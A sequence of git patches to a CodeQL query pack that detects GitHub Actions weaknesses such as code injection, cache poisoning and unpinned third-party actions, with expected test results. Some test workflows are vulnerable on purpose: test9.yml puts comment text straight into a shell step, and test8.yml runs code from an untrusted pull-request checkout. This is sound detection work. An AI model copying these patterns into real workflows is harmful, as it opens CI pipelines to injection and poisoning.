action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 048b0446f5f..738270e3ccd 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -8,6 +8,7 @@ edges | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | +| .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | @@ -87,6 +88,8 @@ nodes | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | semmle.label | steps.changed-files1.outputs.all_changed_files | | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | semmle.label | Uses Step: changed-files3 | | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | semmle.label | steps.changed-files3.outputs.all_changed_files | +| .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | semmle.label | Uses Step: changed-files5 | +| .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | semmle.label | steps.changed-files5.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 0ba7832e8e8..dbbfba0a557 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -1,17 +1,17 @@ -| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | -| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | -| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | -| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | -| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref '3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref '5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref '2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref '2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref '2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | -| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | -| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | -| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | -| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | -| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | -| .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | -| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | +| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref '2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | +| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref '2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref '2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | +| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref '4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref '1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | From d3bb6668f6fca4eb93a8f909bb1f49f5e7f5550d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 09:44:48 +0200 Subject: [PATCH 0246/1267] Missing getMajorVersion predicate --- ql/lib/codeql/actions/Ast.qll | 2 ++ 1 file changed, 2 insertions(+) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index bfbc990d671..6d80c67f7fd 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -372,6 +372,8 @@ abstract class Uses extends AstNode instanceof UsesImpl { string getVersion() { result = super.getVersion() } + int getMajorVersion() { result = super.getMajorVersion() } + string getArgument(string argName) { result = super.getArgument(argName) } Expression getArgumentExpr(string argName) { result = super.getArgumentExpr(argName) } From c39e802c1729d0a9a41e00246686d9395d3bec07 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 13:56:49 +0200 Subject: [PATCH 0247/1267] Fix sources for tj-actions/verify-changed-files --- ql/lib/codeql/actions/dataflow/FlowSources.qll | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index bfe85dbdbe6..9e4c258e39a 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -349,7 +349,20 @@ class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { u.getCallee() = "tj-actions/verify-changed-files" and ( u.getArgument("safe_output") = "false" or - u.getMajorVersion() < 17 + u.getMajorVersion() < 17 or + u.getVersion() + .matches([ + "54e20d3", "a9b6fd3", "30aa174", "7f1b21c", "54e20d3", "0409e18", "7da22d0", + "7016858", "0409e18", "7517b83", "bad2f5d", "3b573ac", "7517b83", "f557547", + "9ed3155", "f557547", "a3391b5", "a3391b5", "1d7ee97", "c432297", "6e986df", + "fa6ea30", "6f40ee1", "1b13d25", "c09bcad", "fda469d", "bd1e271", "367ba21", + "9dea97e", "c154cc6", "527ff75", "e8756d5", "bcb4e76", "25267f5", "ea24bfd", + "f2a40ba", "197e121", "a8f1b11", "95c26dd", "97ba4cc", "68310bb", "720ba6a", + "cedd709", "d68d3d2", "2e1153b", "c3dd635", "81bd1de", "31a9c74", "e981d37", + "e7f801c", "e86d0b9", "ad255a4", "3a8aed1", "de910b5", "d31b2a1", "e61c6fc", + "380890d", "873cfd6", "b0c60c8", "7183183", "6555389", "9828a95", "8150cee", + "48ddf88" + ] + "%") ) and this.asExpr() = u ) From b965a55339d8f4ba98ac701c394a5573a90e94cf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 15:04:48 +0200 Subject: [PATCH 0248/1267] Fix error in select Casting to CachingWritingStep in the select clause was shadowing all the Poisonable result --- ql/src/Security/CWE-349/CachePoisoning.ql | 19 +++++++++++-------- .../CWE-349/.github/workflows/test8.yml | 19 +++++++++++++++++++ 2 files changed, 30 insertions(+), 8 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index e0d59a02ab4..bf18df4797d 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -22,13 +22,16 @@ where // TODO: (require to collect trigger types) // - add push to default branch? // - exclude pull_request_target when branches_ignore includes default branch or when branches does not include the default branch - j.getEnclosingWorkflow() - .hasTriggerEvent([ - "check_run", "check_suite", "delete", "discussion", "discussion_comment", "fork", - "gollum", "issue_comment", "issues", "label", "milestone", "project", "project_card", - "project_column", "public", "pull_request_comment", "pull_request_target", - "repository_dispatch", "schedule", "watch", "workflow_run" - ]) and + ( + j.getEnclosingWorkflow().hasTriggerEvent(defaultBranchTriggerEvent()) + or + j.getEnclosingWorkflow().hasTriggerEvent("workflow_call") and + exists(ExternalJob call, Workflow caller | + call.getCallee() = j.getLocation().getFile().getRelativePath() and + caller = call.getWorkflow() and + caller.hasTriggerEvent(defaultBranchTriggerEvent()) + ) + ) and // The job checkouts untrusted code from a pull request j.getAStep() = checkout and ( @@ -40,4 +43,4 @@ where // (The cache specific token can be leaked even for non-privileged workflows) checkout.getAFollowingStep() instanceof PoisonableStep ) -select j.getAStep().(CacheWritingStep), "Potential cache poisoning on privileged workflow." +select checkout, "Potential cache poisoning on privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml new file mode 100644 index 00000000000..68d3f7f75ac --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test8.yml @@ -0,0 +1,19 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - run: | + ./checkedout/poison + From fafb44d4f662f551e1c0d7cc3969cd4a08df43f3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 15:20:48 +0200 Subject: [PATCH 0249/1267] Add CachePoisoning by Code Injection query --- .../actions/security/CachePoisoningQuery.qll | 17 ++++++++ .../CWE-349/CachePoisoningByCodeInjection.ql | 41 +++++++++++++++++++ .../CWE-349/.github/workflows/test9.yml | 12 ++++++ .../Security/CWE-349/CachePoisoning.expected | 11 ++--- .../CachePoisoningByCodeInjection.expected | 6 +++ .../CachePoisoningByCodeInjection.qlref | 2 + 6 files changed, 84 insertions(+), 5 deletions(-) create mode 100644 ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 6668ef9777d..9762e9d9078 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -1,5 +1,15 @@ import actions +string defaultBranchTriggerEvent() { + result = + [ + "check_run", "check_suite", "delete", "discussion", "discussion_comment", "fork", "gollum", + "issue_comment", "issues", "label", "milestone", "project", "project_card", "project_column", + "public", "pull_request_comment", "pull_request_target", "repository_dispatch", "schedule", + "watch", "workflow_run" + ] +} + abstract class CacheWritingStep extends Step { } class CacheActionUsesStep extends CacheWritingStep, UsesStep { @@ -60,3 +70,10 @@ class SetupDotnetUsesStep extends CacheWritingStep, UsesStep { ) } } + +class SetupRubyUsesStep extends CacheWritingStep, UsesStep { + SetupRubyUsesStep() { + this.getCallee() = ["actions/setup-ruby", "ruby/setup-ruby"] and + this.getArgument("bundler-cache") = "true" + } +} diff --git a/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql new file mode 100644 index 00000000000..2de07ec17bd --- /dev/null +++ b/ql/src/Security/CWE-349/CachePoisoningByCodeInjection.ql @@ -0,0 +1,41 @@ +/** + * @name Cache Poisoning via low-privilege code injection + * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack. + * @kind path-problem + * @problem.severity error + * @precision high + * @security-severity 9.3 + * @id actions/cache-poisoning/code-injection + * @tags actions + * security + * external/cwe/cwe-349 + * external/cwe/cwe-094 + */ + +import actions +import codeql.actions.security.CodeInjectionQuery +import codeql.actions.security.CachePoisoningQuery +import CodeInjectionFlow::PathGraph + +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, LocalJob j +where + CodeInjectionFlow::flowPath(source, sink) and + j = sink.getNode().asExpr().getEnclosingJob() and + not j.isPrivileged() and + // The workflow runs in the context of the default branch + // TODO: (require to collect trigger types) + // - add push to default branch? + // - exclude pull_request_target when branches_ignore includes default branch or when branches does not include the default branch + ( + j.getEnclosingWorkflow().hasTriggerEvent(defaultBranchTriggerEvent()) + or + j.getEnclosingWorkflow().hasTriggerEvent("workflow_call") and + exists(ExternalJob call, Workflow caller | + call.getCallee() = j.getLocation().getFile().getRelativePath() and + caller = call.getWorkflow() and + caller.hasTriggerEvent(defaultBranchTriggerEvent()) + ) + ) +select sink.getNode(), source, sink, + "Potential code injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml new file mode 100644 index 00000000000..3b646b795ac --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test9.yml @@ -0,0 +1,12 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + runs-on: ubuntu-latest + permissions: {} + steps: + - run: | + echo ${{ github.event.comment.body }} + diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 6e0030ad383..67cdea32c5d 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -1,5 +1,6 @@ -| .github/workflows/test1.yml:17:9:21:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test2.yml:12:9:16:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test3.yml:12:9:20:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test6.yml:12:9:16:6 | Uses Step | Potential cache poisoning on privileged workflow. | -| .github/workflows/test7.yml:12:9:15:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test1.yml:12:9:17:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test2.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test3.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test6.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test7.yml:9:9:12:6 | Uses Step | Potential cache poisoning on privileged workflow. | +| .github/workflows/test8.yml:12:9:17:6 | Uses Step | Potential cache poisoning on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected new file mode 100644 index 00000000000..5f244aa2faf --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.expected @@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | +subpaths +#select +| .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref new file mode 100644 index 00000000000..cd1a90049a6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningByCodeInjection.qlref @@ -0,0 +1,2 @@ +Security/CWE-349/CachePoisoningByCodeInjection.ql + From 409a6aa1373db2063058cdc14a59c3d3887895ae Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 18:48:16 +0200 Subject: [PATCH 0250/1267] Update ql/src/Security/CWE-349/CachePoisoning.ql MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Jaroslav LobaÄevski --- ql/src/Security/CWE-349/CachePoisoning.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index bf18df4797d..a1436fd6fe3 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -43,4 +43,4 @@ where // (The cache specific token can be leaked even for non-privileged workflows) checkout.getAFollowingStep() instanceof PoisonableStep ) -select checkout, "Potential cache poisoning on privileged workflow." +select checkout, "Potential cache poisoning of a default branch." From e8f2bc3ef69f2a7171c7442a06ffc13b920d06ae Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:32:11 +0200 Subject: [PATCH 0251/1267] Remove debug method --- ql/lib/codeql/actions/controlflow/internal/Cfg.qll | 2 -- 1 file changed, 2 deletions(-) diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 0db8d63e6f3..ba6430f157f 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -295,5 +295,3 @@ private class InputTree extends LeafTree instanceof Input { } private class ScalarValueLeaf extends LeafTree instanceof ScalarValue { } private class ExpressionLeaf extends LeafTree instanceof Expression { } - -predicate test(ScalarValueLeaf f) { any() } From ddf72a2cf3c03fc38210a21a48694cf9142c826c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:32:24 +0200 Subject: [PATCH 0252/1267] Add more poisonable steps --- ql/lib/codeql/actions/security/PoisonableSteps.qll | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 130879a7cb6..f65bf5fb4dc 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -43,12 +43,19 @@ class LocalCommandExecutionRunStep extends PoisonableStep, Run { or // sh xxxx cmd = line.regexpCapture("(^|\\s+)(ba|z|fi)?sh\\s+(.*)", 3) + or + // node xxxx + cmd = line.regexpCapture("(^|\\s+)(node|python|ruby|go)\\s+(.*)", 3) ) } string getCommand() { result = cmd } } +class LocalActionUsesStep extends PoisonableStep, UsesStep { + LocalActionUsesStep() { this.getCallee().matches("./%") } +} + class EnvVarInjectionRunStep extends PoisonableStep, Run { EnvVarInjectionRunStep() { exists(string value | From f95a3e5298633558718b462d195a4308df1e1cd1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 8 May 2024 22:33:06 +0200 Subject: [PATCH 0253/1267] Refactor eventtrigger and privileged methods Move them from Workflows to Jobs --- ql/lib/codeql/actions/Ast.qll | 7 +- ql/lib/codeql/actions/ast/internal/Ast.qll | 175 +++++++++++------- .../PrivilegedUntrustedCheckoutCritical.ql | 7 +- .../PrivilegedUntrustedCheckoutHigh.ql | 7 +- 4 files changed, 126 insertions(+), 70 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index bfbc990d671..7d10f29af50 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -261,8 +261,6 @@ class Workflow extends AstNode instanceof WorkflowImpl { Permissions getPermissions() { result = super.getPermissions() } Strategy getStrategy() { result = super.getStrategy() } - - predicate isPrivileged() { super.isPrivileged() } } class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { @@ -288,6 +286,7 @@ class Outputs extends AstNode instanceof OutputsImpl { } class Permissions extends AstNode instanceof PermissionsImpl { + bindingset[perm] string getPermission(string perm) { result = super.getPermission(perm) } string getAPermission() { result = super.getAPermission() } @@ -329,6 +328,10 @@ abstract class Job extends AstNode instanceof JobImpl { Permissions getPermissions() { result = super.getPermissions() } + predicate hasTriggerEvent(string trigger) { super.hasTriggerEvent(trigger) } + + string getATriggerEvent() { result = super.getATriggerEvent() } + Strategy getStrategy() { result = super.getStrategy() } predicate isPrivileged() { super.isPrivileged() } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 0cbb8ab10ed..e9989bf6e93 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -64,7 +64,7 @@ private newtype TAstNode = TInputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("inputs") = n) } or TInputNode(YamlValue n) { exists(YamlMapping m | m.lookup("inputs").(YamlMapping).maps(n, _)) } or TOutputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("outputs") = n) } or - TPermissionsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("permissions") = n) } or + 